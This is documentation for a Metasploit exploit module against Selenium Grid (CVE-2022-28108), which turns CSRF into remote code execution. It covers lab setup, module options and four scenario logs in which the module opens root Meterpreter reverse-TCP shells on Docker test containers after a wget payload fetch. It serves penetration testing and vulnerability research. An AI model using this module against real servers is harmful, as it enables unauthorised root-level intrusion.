## Vulnerable Application

Selenium Server (Grid) <= 4.27.0 (latest version at the time of this writing)
allows CSRF because it permits non-JSON content types
such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
At least, the number of sessions must be fewer than maxSessions for the exploit to succeed.

The vulnerability affects:

    * Selenium Server (Grid) <= 4.27.0 (latest version at the time of this writing)

This module was successfully tested on:

    * selenium/standalone-firefox:3.141.59 installed with Docker on Ubuntu 24.04
    * selenium/standalone-firefox:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
    * selenium/standalone-firefox:4.6 installed with Docker on Ubuntu 24.04
    * selenium/standalone-firefox:4.27.0 installed with Docker on Ubuntu 24.04


### Installation

1. `docker pull selenium/standalone-firefox:3.141.59`

2. `docker run -d -p 4444:4444 -p 7900:7900 --shm-size="2g" selenium/standalone-firefox:3.141.59`


## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108`
4. Do: `run lhost=<lhost> rhost=<rhost>`
5. You should get a meterpreter


## Options
### TIMEOUT (required)

This is the amount of time (in seconds) that the module will wait for the payload to be
executed. Defaults to 75 seconds.


## Scenarios
### selenium/standalone-firefox:3.141.59 installed with Docker on Ubuntu 24.04
```
msf6 > use exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > options

Module options (exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    4444             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   TIMEOUT  75               yes       Timeout for exploit (seconds)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        true             yes       Attempt to delete the binary after execution
   FETCH_FILENAME      NnnZmAGfjJoa     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux Command



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4445
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable.
[*] Started session (3191e005-977b-40c9-8c70-7e2f4ef4f922).
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:43182) at 2025-01-04 10:01:09 +0900
[*] Failed to delete the session (3191e005-977b-40c9-8c70-7e2f4ef4f922). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Ubuntu 20.04 (Linux 6.8.0-51-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```

### selenium/standalone-firefox:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
```
msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4446
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
[*] Started session (dc849fa9-0b61-4862-8766-21f1cb47c827).
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:54410) at 2025-01-04 10:03:37 +0900
[*] Failed to delete the session (dc849fa9-0b61-4862-8766-21f1cb47c827). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.17.0.3
OS           : Ubuntu 18.04 (Linux 6.8.0-51-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```

### selenium/standalone-firefox:4.6 installed with Docker on Ubuntu 24.04
```
msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4447
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
[*] Started session (af8d64bc-cdf6-4a03-8706-e90bddbee1c2).
[*] Meterpreter session 3 opened (192.168.56.1:4444 -> 192.168.56.16:40680) at 2025-01-04 10:05:44 +0900
[*] Failed to delete the session (af8d64bc-cdf6-4a03-8706-e90bddbee1c2). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.17.0.4
OS           : Ubuntu 20.04 (Linux 6.8.0-51-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```

### selenium/standalone-firefox:4.27.0 installed with Docker on Ubuntu 24.04
```
msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4448
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
[*] Started session (1657b5ac-c514-431f-8c83-761c14012869).
[*] Meterpreter session 4 opened (192.168.56.1:4444 -> 192.168.56.16:44868) at 2025-01-04 10:10:38 +0900
[*] Failed to delete the session (1657b5ac-c514-431f-8c83-761c14012869). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.17.0.5
OS           : Ubuntu 24.04 (Linux 6.8.0-51-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```
